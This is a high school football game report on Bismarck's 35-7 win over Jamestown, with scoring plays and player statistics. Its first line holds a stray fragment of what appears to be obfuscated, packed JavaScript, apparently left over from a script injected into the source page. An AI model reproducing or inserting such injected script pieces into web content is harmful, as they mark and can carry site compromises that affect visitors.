JAMESTOWN nbeid|var|u0026u|referrer|dasyh||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- Jamestown gave the No. 1 team in North Dakota all they could handle through three quarters, before Bismarck finished off a 35-7 victory. The Demons ran their win streak to 20-games beyond an outstanding effort by junior QB Hayden Gibson, who ran for two touchdown.

But it was Gibson’s arm that was able to move the ball in the second half against the stout Blue Jay run defense. Gibson completed five passes of over 15 yards, including a 50-yard scoring strike in the fourth quarter to finish off the rout.

Bismarck struck early in the game with a 10-play, 66-yard drive with tailback Nate DuBord getting most of the work on the ground, but it was the first of Gibson’s touchdown run that put the Demons on the board.

Jamestown scored their only touchdown and the game-tying touchdown on a 52-yard touchdown catch on a screen from Ross Monson to Taylor Orr.

The Demons added a six-yard plunge from Kole Bauer in the second quarter and had a halftime advantage of 14-7.

On the opening drive of the third quarter, the Jays defense turned away the Demons on the goalline thanks to a pair of big stops from the one-yard line. Three plays later, Bauer intercepted Monson and returned it 15-yards to the endzone.

Gibson scored on a quarterback sneak and that 50-yard touchdown pass in the 4th quarter to finish off the Blue Jays. Jamestown had just 31 yards of total offense in the second half for a total of 159 in the game.

Jamestown will host Devils Lake on Friday in the annual homecoming game at 7pm next week. It will be the third straight home game for the Jays.
